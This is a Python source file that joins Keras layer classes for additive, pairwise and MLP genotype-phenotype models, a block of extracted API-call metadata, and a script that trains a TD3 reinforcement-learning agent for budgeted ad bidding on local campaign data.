    a sub-class of this class.
    """

    #@handle_errors
    def __init__(self):
        """Construct layer instance."""
        # Call superclass constructor
        super().__init__()

    #@handle_errors
    def get_config(self):
        """Return configuration dictionary."""
        # NOTE(review): super(Layer, self) skips Layer's own get_config in
        # the MRO -- confirm this is intended rather than a typo for
        # super().get_config().
        base_config = super(Layer, self).get_config()
        return {**base_config}

    #@handle_errors
    def build(self, input_shape):
        """Build layer."""
        super().build(input_shape)

    ### The following methods must be fully overridden

    def call(self, inputs):
        """Process layer input and return output. Must be overridden."""
        # Raise instead of `assert False`: asserts are stripped under
        # `python -O`, which would have silently returned np.nan here.
        raise NotImplementedError(
            'call() must be overridden by CustomGPMapLayer subclasses.')

    def set_params(self, **kwargs):
        """Set values of layer parameters. Must be overridden."""
        raise NotImplementedError(
            'set_params() must be overridden by CustomGPMapLayer subclasses.')

    def get_params(self):
        """Get values of layer parameters. Must be overridden."""
        raise NotImplementedError(
            'get_params() must be overridden by CustomGPMapLayer subclasses.')
class AdditiveGPMapLayer(GPMapLayer):
    """Represents an additive G-P map:
    phi(x) = theta_0 + sum_{l,c} theta_lc * x_lc."""

    @handle_errors
    def __init__(self, *args, **kwargs):
        """Construct layer instance."""
        super().__init__(*args, **kwargs)

    @handle_errors
    def build(self, input_shape):
        """Build layer by creating trainable weights theta_0 and theta_lc."""

        # Define theta_0 (constant/intercept term)
        self.theta_0 = self.add_weight(name='theta_0',
                                       shape=(1,),
                                       initializer=Constant(0.),
                                       trainable=True,
                                       regularizer=self.regularizer)

        # Define theta_lc parameters, one per (position, character) pair;
        # initialized at scale 1/sqrt(L)
        theta_lc_shape = (1, self.L, self.C)
        theta_lc_init = np.random.randn(*theta_lc_shape)/np.sqrt(self.L)
        self.theta_lc = self.add_weight(name='theta_lc',
                                        shape=theta_lc_shape,
                                        initializer=Constant(theta_lc_init),
                                        trainable=True,
                                        regularizer=self.regularizer)

        # Call superclass build
        super().build(input_shape)

    def call(self, x_lc):
        """Process layer input and return output of shape (batch, 1)."""
        # Shape input as (batch, L, C) one-hot tensor
        x_lc = tf.reshape(x_lc, [-1, self.L, self.C])
        phi = self.theta_0 + \
              tf.reshape(K.sum(self.theta_lc * x_lc, axis=[1, 2]),
                         shape=[-1, 1])
        return phi

    @handle_errors
    def set_params(self, theta_0=None, theta_lc=None):
        """
        Set values of layer parameters.

        Parameters passed as None are left at their current values
        (previously a None would have been forwarded to set_weights and
        crashed or corrupted the layer).

        Parameters
        ----------
        theta_0: (float or None)

        theta_lc: (np.ndarray or None)
            Shape (L,C)

        Returns
        -------
        None
        """
        # Current weights, in creation order [theta_0, theta_lc]; used as
        # defaults so a partial update does not clobber the other weight.
        curr_theta_0, curr_theta_lc = self.get_weights()

        # Check and convert theta_0
        if theta_0 is not None:
            check(isinstance(theta_0, float),
                  f'type(theta_0)={theta_0}; must be float')
            curr_theta_0 = np.array([theta_0])

        # Check and reshape theta_lc
        if theta_lc is not None:
            check(isinstance(theta_lc, np.ndarray),
                  f'type(theta_lc)={theta_lc}; must be np.ndarray')
            check(theta_lc.size == self.L * self.C,
                  f'theta_lc.size={repr(theta_lc.size)}; '
                  f'must be ({self.L * self.C}).')
            curr_theta_lc = theta_lc.reshape([1, self.L, self.C])

        # Set weight values
        self.set_weights([curr_theta_0, curr_theta_lc])

    @handle_errors
    def get_params(self):
        """
        Get values of layer parameters.

        Parameters
        ----------
        None.

        Returns
        -------
        param_dict: (dict)
            Dictionary containing model parameters. Model parameters are
            returned as matrices, NOT as individual named parameters, and are
            NOT gauge-fixed.
        """
        # Get list of weights, in creation order [theta_0, theta_lc]
        param_list = self.get_weights()

        # Fill param_dict
        param_dict = {}
        param_dict['theta_0'] = param_list[0]
        param_dict['theta_lc'] = param_list[1].reshape([self.L, self.C])
        return param_dict
class PairwiseGPMapLayer(GPMapLayer):
    """Represents a pairwise G-P map: an additive model plus masked
    position-pair interaction terms theta_lclc."""
    @handle_errors
    def __init__(self, *args, **kwargs):
        """Construct layer instance.

        Requires self.mask_type (set by GPMapLayer.__init__) to be
        'neighbor' (adjacent positions only) or 'pairwise' (all l' > l).
        """
        super().__init__(*args, **kwargs)
        # Set mask type
        check(self.mask_type in ['neighbor', 'pairwise'],
              f'self.mask_type={repr(self.mask_type)}; must be'
              f'one of ["neighbor","pairwise"]')
        # Create boolean mask of shape (1, L, C, L, C); an entry is True
        # when the second position index exceeds the first, so each
        # unordered position pair is counted exactly once.
        ls = np.arange(self.L).astype(int)
        ls1 = np.tile(ls.reshape([1, self.L, 1, 1, 1]),
                      [1, 1, self.C, self.L, self.C])
        ls2 = np.tile(ls.reshape([1, 1, 1, self.L, 1]),
                      [1, self.L, self.C, 1, self.C])
        if self.mask_type == 'pairwise':
            # All ordered pairs with l' > l
            self.mask = (ls2 - ls1 >= 1)
        elif self.mask_type == 'neighbor':
            # Only adjacent positions, l' == l + 1
            self.mask = (ls2 - ls1 == 1)
        else:
            assert False, "This should not work"
    @handle_errors
    def get_config(self):
        """Return configuration dictionary (base config plus mask_type)."""
        base_config = super().get_config()
        return {'mask_type': self.mask_type,
                **base_config}
    @handle_errors
    def build(self, input_shape):
        """Build layer by creating weights theta_0, theta_lc, theta_lclc."""
        # Define theta_0 (constant/intercept term)
        self.theta_0 = self.add_weight(name='theta_0',
                                       shape=(1,),
                                       initializer=Constant(0.),
                                       trainable=True,
                                       regularizer=self.regularizer)
        # Define theta_lc parameters (additive terms), initialized at
        # scale 1/sqrt(L)
        theta_lc_shape = (1, self.L, self.C)
        theta_lc_init = np.random.randn(*theta_lc_shape)/np.sqrt(self.L)
        self.theta_lc = self.add_weight(name='theta_lc',
                                        shape=theta_lc_shape,
                                        initializer=Constant(theta_lc_init),
                                        trainable=True,
                                        regularizer=self.regularizer)
        # Define theta_lclc parameters (pairwise terms); entries outside
        # the mask are zeroed at initialization (the mask is re-applied
        # in call(), so masked entries never contribute to phi)
        theta_lclc_shape = (1, self.L, self.C, self.L, self.C)
        theta_lclc_init = np.random.randn(*theta_lclc_shape)/np.sqrt(self.L**2)
        theta_lclc_init *= self.mask
        self.theta_lclc = self.add_weight(name='theta_lclc',
                                          shape=theta_lclc_shape,
                                          initializer=Constant(theta_lclc_init),
                                          trainable=True,
                                          regularizer=self.regularizer)
        # Call superclass build
        super().build(input_shape)
    def call(self, x_lc):
        """Process layer input and return output of shape (batch, 1)."""
        # Compute phi = theta_0 + additive term + masked pairwise term
        phi = self.theta_0
        phi = phi + tf.reshape(K.sum(self.theta_lc *
                                     tf.reshape(x_lc, [-1, self.L, self.C]),
                                     axis=[1, 2]),
                               shape=[-1, 1])
        phi = phi + tf.reshape(K.sum(self.theta_lclc *
                                     self.mask *
                                     tf.reshape(x_lc,
                                                [-1, self.L, self.C, 1, 1]) *
                                     tf.reshape(x_lc,
                                                [-1, 1, 1, self.L, self.C]),
                                     axis=[1, 2, 3, 4]),
                               shape=[-1, 1])
        return phi
    @handle_errors
    def set_params(self, theta_0=None, theta_lc=None, theta_lclc=None):
        """
        Set values of layer parameters.

        Parameters
        ----------
        theta_0: (float)

        theta_lc: (np.ndarray)
            Shape (L,C)

        theta_lclc: (np.ndarray)
            Shape (L,C,L,C)

        Returns
        -------
        None
        """
        # Check theta_0
        if theta_0 is not None:
            check(isinstance(theta_0, float),
                  f'type(theta_0)={theta_0}; must be float')
        # Check theta_lc
        if theta_lc is not None:
            check(isinstance(theta_lc, np.ndarray),
                  f'type(theta_lc)={theta_lc}; must be np.ndarray')
            check(theta_lc.size == self.L * self.C,
                  f'theta_lc.size={repr(theta_lc.size)}; '
                  f'must be ({self.L * self.C}).')
            theta_lc = theta_lc.reshape([1, self.L, self.C])
        # Check theta_lclc
        if theta_lclc is not None:
            check(isinstance(theta_lclc, np.ndarray),
                  f'type(theta_lclc)={theta_lclc}; must be np.ndarray')
            check(theta_lclc.size == self.L * self.C * self.L * self.C,
                  f'theta_lclc.size={repr(theta_lclc.size)}; '
                  f'must be ({self.L * self.C * self.L * self.C}).')
            theta_lclc = theta_lclc.reshape([1, self.L, self.C, self.L, self.C])
        # Set weight values, in creation order [theta_0, theta_lc, theta_lclc].
        # NOTE(review): a None argument here is forwarded to set_weights
        # unchanged -- callers are expected to pass all three values.
        self.set_weights([np.array([theta_0]), theta_lc, theta_lclc])
    @handle_errors
    def get_params(self):
        """
        Get values of layer parameters.

        Parameters
        ----------
        None.

        Returns
        -------
        param_dict: (dict)
            Dictionary containing model parameters. Model parameters are
            returned as matrices, NOT as individual named parameters, and are
            NOT gauge-fixed.
        """
        # Get list of weights, in creation order [theta_0, theta_lc, theta_lclc]
        param_list = self.get_weights()
        # Fill param_dict; masked (non-interacting) pairwise entries are
        # reported as np.nan rather than their stored values
        param_dict = {}
        param_dict['theta_0'] = param_list[0]
        param_dict['theta_lc'] = param_list[1].reshape([self.L, self.C])
        masked_theta_lclc = param_list[2]
        masked_theta_lclc[~self.mask] = np.nan
        param_dict['theta_lclc'] = \
            masked_theta_lclc.reshape([self.L, self.C, self.L, self.C])
        return param_dict
class MultilayerPerceptronGPMap(GPMapLayer):
    """Represents an MLP G-P map: one-hot (and optionally pairwise)
    sequence features fed through a stack of Dense layers to a scalar phi."""
    @handle_errors
    def __init__(self,
                 *args,
                 hidden_layer_sizes=(10, 10, 10),
                 hidden_layer_activation='relu',
                 features='additive',
                 **kwargs):
        """Construct layer instance.

        Parameters
        ----------
        hidden_layer_sizes: (iterable of int)
            Number of units in each hidden Dense layer; may be empty.
        hidden_layer_activation: (str)
            Activation used by every hidden layer.
        features: (str)
            Input featurization: 'additive', 'neighbor', or 'pairwise'.
        """
        # Check and set hidden layer sizes
        check(isinstance(hidden_layer_sizes, Iterable),
              f'type(hidden_layer_sizes)={type(hidden_layer_sizes)}; '
              f'must be Iterable.')
        check(all([x >= 1 for x in hidden_layer_sizes]),
              f'all elements of hidden_layer_sizes={hidden_layer_sizes}'
              f'must be >= 1')
        check(all([isinstance(x, int) for x in hidden_layer_sizes]),
              f'all elements of hidden_layer_sizes={hidden_layer_sizes}'
              f'must be int.')
        self.hidden_layer_sizes = hidden_layer_sizes
        # Check and set features
        allowed_features = ['additive','neighbor','pairwise']
        check(features in allowed_features,
              f'features={repr(features)}; must be one of {allowed_features}.')
        self.features = features
        # Initialize array to hold layers; populated in build()
        self.layers = []
        # Set activation
        self.hidden_layer_activation = hidden_layer_activation
        super().__init__(*args, **kwargs)
    @handle_errors
    def build(self, input_shape):
        """Build layer: compute feature count, pairwise-feature mask,
        and the Dense layer stack."""
        # Determine input shape (number of features after featurization)
        L = self.L
        C = self.C
        if self.features == 'additive':
            self.num_features = L*C
        elif self.features == 'neighbor':
            self.num_features = L*C + (L-1)*(C**2)
        elif self.features == 'pairwise':
            # True division makes this a float; cast back via int() below
            self.num_features = L*C + L*(L-1)*(C**2)/2
        self.x_shape = (input_shape[0], int(self.num_features))
        # Create mask over flattened (L,C,L,C) pair indices selecting the
        # interacting position pairs (l' > l, or l' == l + 1 for neighbor)
        ls = np.arange(self.L).astype(int)
        ls1 = np.tile(ls.reshape([L, 1, 1, 1]),
                      [1, C, L, C])
        ls2 = np.tile(ls.reshape([1, 1, L, 1]),
                      [L, C, 1, C])
        if self.features in ['neighbor', 'pairwise']:
            if self.features == 'pairwise':
                mask_lclc = (ls2 - ls1 >= 1)
            else:
                mask_lclc = (ls2 - ls1 == 1)
            mask_vec = np.reshape(mask_lclc, L*C*L*C)
            # Integer indices of the columns kept by tf.gather in call()
            self.mask_ints = np.arange(L*C*L*C, dtype=int)[mask_vec]
        elif self.features == 'additive':
            self.mask_ints = None
        else:
            assert False, "This should not work"
        # Make sure self.layers is empty (build may be called again)
        self.layers = []
        if len(self.hidden_layer_sizes) >= 1:
            # Add hidden layer #1 (the only one given an input_shape)
            size = self.hidden_layer_sizes[0]
            self.layers.append(
                Dense(units=size,
                      activation=self.hidden_layer_activation,
                      input_shape=self.x_shape,
                      kernel_regularizer=self.regularizer,
                      bias_regularizer=self.regularizer)
            )
            # Add rest of hidden layers
            for size in self.hidden_layer_sizes[1:]:
                self.layers.append(
                    Dense(units=size,
                          activation=self.hidden_layer_activation,
                          kernel_regularizer=self.regularizer,
                          bias_regularizer=self.regularizer)
                )
            # Add output layer (scalar, linear)
            self.layers.append(
                Dense(units=1,
                      activation='linear',
                      kernel_regularizer=self.regularizer,
                      bias_regularizer=self.regularizer)
            )
        elif len(self.hidden_layer_sizes) == 0:
            # Add single layer; no hidden nodes (linear model)
            self.layers.append(
                Dense(units=1,
                      activation='linear',
                      input_shape=self.x_shape,
                      kernel_regularizer=self.regularizer,
                      bias_regularizer=self.regularizer)
            )
        else:
            assert False, 'This should not happen.'
        # Build superclass
        super().build(input_shape)
    def call(self, x_add):
        """Process layer input and return output of shape (batch, 1)."""
        # Create input features
        if self.features == 'additive':
            tensor = x_add
        elif self.features in ['neighbor', 'pairwise']:
            # Outer product of the one-hot encoding with itself yields
            # all (l,c,l',c') products; flatten, then keep masked columns
            L = self.L
            C = self.C
            x___lc = tf.reshape(x_add, [-1, 1, 1, L, C])
            x_lc__ = tf.reshape(x_add, [-1, L, C, 1, 1])
            x_lclc = x___lc * x_lc__
            x_pair = tf.reshape(x_lclc, [-1, L*C*L*C])
            # Only use relevant columns
            x_2pt = tf.gather(x_pair, self.mask_ints, axis=1)
            # Make input tensor: additive features plus pair features
            tensor = tf.concat([x_add, x_2pt], axis=1)
        # Run tensor through layers
        for layer in self.layers:
            tensor = layer(tensor)
        phi = tensor
        return phi
    @handle_errors
    def set_params(self, theta_0=None, theta_lc=None):
        """
        Does nothing for MultilayerPerceptronGPMap
        """
        print('Warning: MultilayerPerceptronGPMap.set_params() does nothing.')
    @handle_errors
    def get_params(self):
        """
        Get values of layer parameters.

        Parameters
        ----------
        None.

        Returns
        -------
        param_dict: (dict)
            Dictionary containing model parameters.
        """
        # Fill param_dict with per-layer [kernel, bias] weight lists
        param_dict = {}
        param_dict['theta_mlp'] = [layer.get_weights() for layer in self.layers]
        return param_dict
| [
"tensorflow.keras.backend.sum",
"numpy.random.randn",
"tensorflow.keras.layers.Dense",
"tensorflow.gather",
"tensorflow.reshape",
"tensorflow.concat",
"tensorflow.keras.regularizers.L2",
"numpy.array",
"numpy.reshape",
"tensorflow.keras.initializers.Constant",
"numpy.arange",
"numpy.sqrt"
] | [((1045, 1096), 'tensorflow.keras.regularizers.L2', 'tf.keras.regularizers.L2', (['self.theta_regularization'], {}), '(self.theta_regularization)\n', (1069, 1096), True, 'import tensorflow as tf\n'), ((4346, 4384), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C]'], {}), '(x_lc, [-1, self.L, self.C])\n', (4356, 4384), True, 'import tensorflow as tf\n'), ((3791, 3823), 'numpy.random.randn', 'np.random.randn', (['*theta_lc_shape'], {}), '(*theta_lc_shape)\n', (3806, 3823), True, 'import numpy as np\n'), ((3824, 3839), 'numpy.sqrt', 'np.sqrt', (['self.L'], {}), '(self.L)\n', (3831, 3839), True, 'import numpy as np\n'), ((7829, 7861), 'numpy.random.randn', 'np.random.randn', (['*theta_lc_shape'], {}), '(*theta_lc_shape)\n', (7844, 7861), True, 'import numpy as np\n'), ((7862, 7877), 'numpy.sqrt', 'np.sqrt', (['self.L'], {}), '(self.L)\n', (7869, 7877), True, 'import numpy as np\n'), ((8329, 8363), 'numpy.random.randn', 'np.random.randn', (['*theta_lclc_shape'], {}), '(*theta_lclc_shape)\n', (8344, 8363), True, 'import numpy as np\n'), ((8364, 8384), 'numpy.sqrt', 'np.sqrt', (['(self.L ** 2)'], {}), '(self.L ** 2)\n', (8371, 8384), True, 'import numpy as np\n'), ((14355, 14391), 'numpy.reshape', 'np.reshape', (['mask_lclc', '(L * C * L * C)'], {}), '(mask_lclc, L * C * L * C)\n', (14365, 14391), True, 'import numpy as np\n'), ((3546, 3559), 'tensorflow.keras.initializers.Constant', 'Constant', (['(0.0)'], {}), '(0.0)\n', (3554, 3559), False, 'from tensorflow.keras.initializers import Constant\n'), ((4011, 4034), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lc_init'], {}), '(theta_lc_init)\n', (4019, 4034), False, 'from tensorflow.keras.initializers import Constant\n'), ((4442, 4482), 'tensorflow.keras.backend.sum', 'K.sum', (['(self.theta_lc * x_lc)'], {'axis': '[1, 2]'}), '(self.theta_lc * x_lc, axis=[1, 2])\n', (4447, 4482), True, 'import tensorflow.keras.backend as K\n'), ((5471, 5490), 'numpy.array', 'np.array', 
(['[theta_0]'], {}), '([theta_0])\n', (5479, 5490), True, 'import numpy as np\n'), ((6630, 6647), 'numpy.arange', 'np.arange', (['self.L'], {}), '(self.L)\n', (6639, 6647), True, 'import numpy as np\n'), ((7584, 7597), 'tensorflow.keras.initializers.Constant', 'Constant', (['(0.0)'], {}), '(0.0)\n', (7592, 7597), False, 'from tensorflow.keras.initializers import Constant\n'), ((8049, 8072), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lc_init'], {}), '(theta_lc_init)\n', (8057, 8072), False, 'from tensorflow.keras.initializers import Constant\n'), ((8601, 8626), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lclc_init'], {}), '(theta_lclc_init)\n', (8609, 8626), False, 'from tensorflow.keras.initializers import Constant\n'), ((11140, 11159), 'numpy.array', 'np.array', (['[theta_0]'], {}), '([theta_0])\n', (11148, 11159), True, 'import numpy as np\n'), ((13906, 13923), 'numpy.arange', 'np.arange', (['self.L'], {}), '(self.L)\n', (13915, 13923), True, 'import numpy as np\n'), ((14415, 14450), 'numpy.arange', 'np.arange', (['(L * C * L * C)'], {'dtype': 'int'}), '(L * C * L * C, dtype=int)\n', (14424, 14450), True, 'import numpy as np\n'), ((14836, 15002), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': 'size', 'activation': 'self.hidden_layer_activation', 'input_shape': 'self.x_shape', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), '(units=size, activation=self.hidden_layer_activation, input_shape=self\n .x_shape, kernel_regularizer=self.regularizer, bias_regularizer=self.\n regularizer)\n', (14841, 15002), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((15552, 15663), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': '(1)', 'activation': '"""linear"""', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), "(units=1, activation='linear', kernel_regularizer=self.regularizer,\n bias_regularizer=self.regularizer)\n", (15557, 15663), 
False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((16553, 16588), 'tensorflow.reshape', 'tf.reshape', (['x_add', '[-1, 1, 1, L, C]'], {}), '(x_add, [-1, 1, 1, L, C])\n', (16563, 16588), True, 'import tensorflow as tf\n'), ((16610, 16645), 'tensorflow.reshape', 'tf.reshape', (['x_add', '[-1, L, C, 1, 1]'], {}), '(x_add, [-1, L, C, 1, 1])\n', (16620, 16645), True, 'import tensorflow as tf\n'), ((16704, 16743), 'tensorflow.reshape', 'tf.reshape', (['x_lclc', '[-1, L * C * L * C]'], {}), '(x_lclc, [-1, L * C * L * C])\n', (16714, 16743), True, 'import tensorflow as tf\n'), ((16799, 16840), 'tensorflow.gather', 'tf.gather', (['x_pair', 'self.mask_ints'], {'axis': '(1)'}), '(x_pair, self.mask_ints, axis=1)\n', (16808, 16840), True, 'import tensorflow as tf\n'), ((16895, 16928), 'tensorflow.concat', 'tf.concat', (['[x_add, x_2pt]'], {'axis': '(1)'}), '([x_add, x_2pt], axis=1)\n', (16904, 16928), True, 'import tensorflow as tf\n'), ((15245, 15379), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': 'size', 'activation': 'self.hidden_layer_activation', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), '(units=size, activation=self.hidden_layer_activation,\n kernel_regularizer=self.regularizer, bias_regularizer=self.regularizer)\n', (15250, 15379), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((15884, 16021), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': '(1)', 'activation': '"""linear"""', 'input_shape': 'self.x_shape', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), "(units=1, activation='linear', input_shape=self.x_shape,\n kernel_regularizer=self.regularizer, bias_regularizer=self.regularizer)\n", (15889, 16021), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((9045, 9083), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C]'], {}), '(x_lc, [-1, self.L, self.C])\n', (9055, 9083), True, 'import tensorflow as tf\n'), ((9448, 
9492), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, 1, 1, self.L, self.C]'], {}), '(x_lc, [-1, 1, 1, self.L, self.C])\n', (9458, 9492), True, 'import tensorflow as tf\n'), ((9323, 9367), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C, 1, 1]'], {}), '(x_lc, [-1, self.L, self.C, 1, 1])\n', (9333, 9367), True, 'import tensorflow as tf\n')] |
import pandas as pd
import numpy as np
import tqdm
import datetime
import os
import random
import FAB.models.RL_brain_fab as td3
import sklearn.preprocessing as pre
import tqdm
import torch
import torch.nn as nn
import torch.utils.data
from itertools import islice
from FAB.config import config
import logging
import sys
# Promote all numpy floating-point warnings (divide, overflow, invalid,
# underflow) to raised exceptions so silent numeric problems in the
# bidding/reward computations fail loudly.
np.seterr(all='raise')
def setup_seed(seed):
    """Seed every RNG used by this script (python, numpy, torch CPU and
    CUDA) and force deterministic cuDNN kernels, for reproducible runs."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.deterministic = True
def bidding(bid, cap=300):
    """Clamp a raw bid price into an integer bid.

    Parameters
    ----------
    bid: (float or int)
        Raw (possibly fractional) bid price; fractions are truncated.
    cap: (int)
        Maximum allowed bid. Defaults to 300, the market price ceiling
        used throughout this script; parameterized for reuse.

    Returns
    -------
    (int) truncated bid, capped at `cap`.
    """
    return int(bid if bid <= cap else cap)
def generate_bid_price(datas):
    '''
    Convert raw bid prices into an integer numpy array, truncating each
    price and capping it at the 300 market price ceiling.
    :param datas: iterable of raw (possibly fractional) bid prices
    :return: np.ndarray of ints
    '''
    capped = [int(price) if price <= 300 else 300 for price in datas]
    return np.array(capped).astype(int)
def bid_main(bid_prices, imp_datas, budget):
    '''
    Main bidding routine: simulate bidding on a stream of impressions
    under a budget. imp_datas columns are [clk, ctr, mprice, hour]; a bid
    wins an impression when bid_price >= market price (column 2). Uses a
    binary search over the cumulative cost of won impressions to find how
    many can be afforded, then greedily spends any leftover budget.
    :param bid_prices: int array of bid prices, aligned with imp_datas rows
    :param imp_datas: ndarray of impressions
    :return: (win_clks, real_clks, bids, imps, cost)
    '''
    # Indices of impressions this bid vector would win, and their rows
    win_imp_indexs = np.where(bid_prices >= imp_datas[:, 2])[0]
    win_imp_datas = imp_datas[win_imp_indexs, :]
    win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
    if len(win_imp_datas):
        # Binary search for the largest prefix of won impressions whose
        # total market price fits in the budget
        first, last = 0, win_imp_datas.shape[0] - 1
        final_index = 0
        while first <= last:
            mid = first + (last - first) // 2
            tmp_sum = np.sum(win_imp_datas[:mid, 2])
            if tmp_sum < budget:
                first = mid + 1
            else:
                last_sum = np.sum(win_imp_datas[:mid - 1, 2])
                if last_sum <= budget:
                    final_index = mid - 1
                    break
                else:
                    last = mid - 1
        # If the loop exhausted without fixing final_index, the whole
        # prefix fit; fall back to the search cursor
        final_index = final_index if final_index else first
        win_clks = np.sum(win_imp_datas[:final_index, 0])
        origin_index = win_imp_indexs[final_index - 1]
        real_clks = np.sum(imp_datas[:origin_index, 0])
        imps = final_index + 1
        bids = origin_index + 1
        cost = np.sum(win_imp_datas[:final_index, 2])
        current_cost = np.sum(win_imp_datas[:final_index, 2])
        if len(win_imp_datas[final_index:, :]) > 0:
            if current_cost < budget:
                # Leftover budget: greedily buy affordable impressions
                # beyond the binary-search prefix, stopping when the
                # next win no longer fits
                budget -= current_cost
                final_imps = win_imp_datas[final_index:, :]
                lt_budget_indexs = np.where(final_imps[:, 2] <= budget)[0]
                final_mprice_lt_budget_imps = final_imps[lt_budget_indexs]
                last_win_index = 0
                for idx, imp in enumerate(final_mprice_lt_budget_imps):
                    tmp_mprice = final_mprice_lt_budget_imps[idx, 2]
                    if budget - tmp_mprice >= 0:
                        win_clks += final_mprice_lt_budget_imps[idx, 0]
                        imps += 1
                        # Count every impression passed over since the
                        # previous win as a bid
                        bids += (lt_budget_indexs[idx] - last_win_index + 1)
                        last_win_index = lt_budget_indexs[idx]
                        cost += tmp_mprice
                        budget -= tmp_mprice
                    else:
                        break
                real_clks += np.sum(final_imps[:last_win_index, 0])
            else:
                # Binary-search prefix overshot the budget: discard the
                # prefix tallies and process won impressions one by one
                win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
                last_win_index = 0
                for idx, imp in enumerate(win_imp_datas):
                    tmp_mprice = win_imp_datas[idx, 2]
                    real_clks += win_imp_datas[idx, 0]
                    if budget - tmp_mprice >= 0:
                        win_clks += win_imp_datas[idx, 0]
                        imps += 1
                        bids += (win_imp_indexs[idx] - last_win_index + 1)
                        last_win_index = win_imp_indexs[idx]
                        cost += tmp_mprice
                        budget -= tmp_mprice
    return win_clks, real_clks, bids, imps, cost
def get_model(args, device):
    """Build the TD3 bidding agent from the run configuration.

    :param args: parsed config namespace (learning rates, memory size, ...)
    :param device: torch device the agent should run on
    :return: a td3.TD3_Model instance
    """
    model_kwargs = dict(
        action_nums=1,
        lr_A=args.lr_A,
        lr_C=args.lr_C,
        memory_size=args.memory_size,
        tau=args.tau,
        batch_size=args.rl_batch_size,
        device=device,
    )
    return td3.TD3_Model(args.neuron_nums, **model_kwargs)
def get_dataset(args):
    """Load the train/test bid logs and derive campaign statistics.

    CSV columns read: clk, ctr, mprice, hour, time_frac; the returned
    arrays keep only [clk, ctr, mprice, hour] as floats.

    :return: (train_data, test_data, ecpc, origin_ctr, avg_mprice)
    """
    base = args.data_path + args.dataset_name + args.campaign_id
    load_columns = ['clk', 'ctr', 'mprice', 'hour', 'time_frac']
    keep_columns = ['clk', 'ctr', 'mprice', 'hour']

    def _load(split):
        # Read one split ('train' or 'test') and keep the float columns
        frame = pd.read_csv(base + split + '.bid.' + args.sample_type + '.data')[load_columns]
        return frame[keep_columns].values.astype(float)

    train_data = _load('train')
    test_data = _load('test')

    # Campaign statistics from the training split
    total_clks = np.sum(train_data[:, 0])
    total_cost = np.sum(train_data[:, 2])
    ecpc = total_cost / total_clks               # effective cost per click
    origin_ctr = total_clks / len(train_data)    # average click-through rate
    avg_mprice = total_cost / len(train_data)    # average market price

    return train_data, test_data, ecpc, origin_ctr, avg_mprice
def reward_func(reward_type, fab_clks, hb_clks, fab_cost, hb_cost):
    """Reward for the FAB agent relative to the heuristic-bid baseline.

    The base reward r grades clicks-vs-cost against the baseline:
    +5 (more clicks, cheaper), +1 (more clicks, pricier),
    -2.5 (fewer clicks, cheaper), -5 (fewer clicks, pricier).
    reward_type selects the final value: 'op' -> r/1000, 'nop' -> r,
    'nop_2.0' -> fab_clks/1000, anything else -> fab_clks.
    """
    matches_clks = fab_clks >= hb_clks
    spends_less = fab_cost < hb_cost
    if matches_clks:
        r = 5 if spends_less else 1
    else:
        r = -2.5 if spends_less else -5
    if reward_type == 'op':
        return r / 1000
    if reward_type == 'nop':
        return r
    if reward_type == 'nop_2.0':
        return fab_clks / 1000
    return fab_clks
'''
1458
437520 447493
30309883.0 30297100.0
395.0 356.0
3358
237844 335310
23340047.0 32515709.0
197.0 307.0
3386
412275 392901
32967478.0 31379459.0
344.0 355.0
3427
379524 390398
30918866.0 31654042.0
282.0 313.0
'''
if __name__ == '__main__':
    # ----- configuration and data -----
    campaign_id = '1458/'  # 1458, 3427
    args = config.init_parser(campaign_id)
    train_data, test_data, ecpc, origin_ctr, avg_mprice = get_dataset(args)
    setup_seed(args.seed)
    # Create log and parameter directories if missing
    log_dirs = [args.save_log_dir, args.save_log_dir + args.campaign_id]
    for log_dir in log_dirs:
        if not os.path.exists(log_dir):
            os.mkdir(log_dir)
    param_dirs = [args.save_param_dir, args.save_param_dir + args.campaign_id]
    for param_dir in param_dirs:
        if not os.path.exists(param_dir):
            os.mkdir(param_dir)
    # File logging at DEBUG, plus an INFO stream handler on stdout
    logging.basicConfig(level=logging.DEBUG,
                        filename=args.save_log_dir + str(args.campaign_id).strip('/') + args.model_name + '_output.log',
                        datefmt='%Y/%m/%d %H:%M:%S',
                        format='%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(module)s - %(message)s')
    logger = logging.getLogger(__name__)
    logger.setLevel(logging.DEBUG)
    stream_handler = logging.StreamHandler(sys.stdout)
    stream_handler.setLevel(logging.INFO)
    logger.addHandler(stream_handler)
    submission_path = args.data_path + args.dataset_name + args.campaign_id + args.model_name + '/'  # folder where ctr prediction results are stored
    if not os.path.exists(submission_path):
        os.mkdir(submission_path)
    device = torch.device(args.device)  # select the compute device
    logger.info(campaign_id)
    logger.info('RL model ' + args.model_name + ' has been training')
    logger.info(args)
    # Candidate base-bid multipliers for the heuristic-bid (hb) baseline
    actions = np.array(list(np.arange(2, 20, 2)) + list(np.arange(20, 100, 5)) + list(np.arange(100, 301, 10)))
    rl_model = get_model(args, device)
    B = args.budget * args.budget_para[0]
    # ----- grid-search the best fixed base bid on training data -----
    hb_clk_dict = {}
    for para in actions:
        bid_datas = generate_bid_price(train_data[:, 1] * para / origin_ctr)
        res_ = bid_main(bid_datas, train_data, B)
        hb_clk_dict.setdefault(para, res_[0])
